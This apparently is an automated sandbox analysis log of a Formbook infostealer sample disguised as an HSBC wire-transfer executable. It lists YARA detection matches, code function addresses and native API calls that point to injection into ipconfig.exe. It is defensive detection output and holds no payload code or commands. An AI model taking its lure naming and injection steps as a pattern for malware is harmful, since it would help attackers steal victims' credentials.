          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_00C68250
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_00C6D2F8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041E30C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041DB36
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409E5F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409E60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D6AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C05C24
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162F900
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016FE824
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1002
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F28EC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F20A8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B090
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AB40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F2B28
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E03DA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EDBD2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165ABD8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165EBB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFA2B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F22AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1D55
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01620D20
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F2D07
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F25DD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016ED466
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163841F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1FF1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016FDFCE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01646E30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016ED616
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366AB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03712B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037003DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FFA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037122AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0371E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03701002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037128EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036720A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037120A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03711FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0371DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03666E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03712EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03711D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03640D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03712D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037125DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D6AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C69E5F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C69E60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0364B150 appears 72 times
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A35A NtCreateFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A3B2 NtCreateFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A10 NtQuerySection,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669560 NtWriteFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669760 NtOpenProcess,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A770 NtOpenThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A00 NtProtectVirtualMemory,
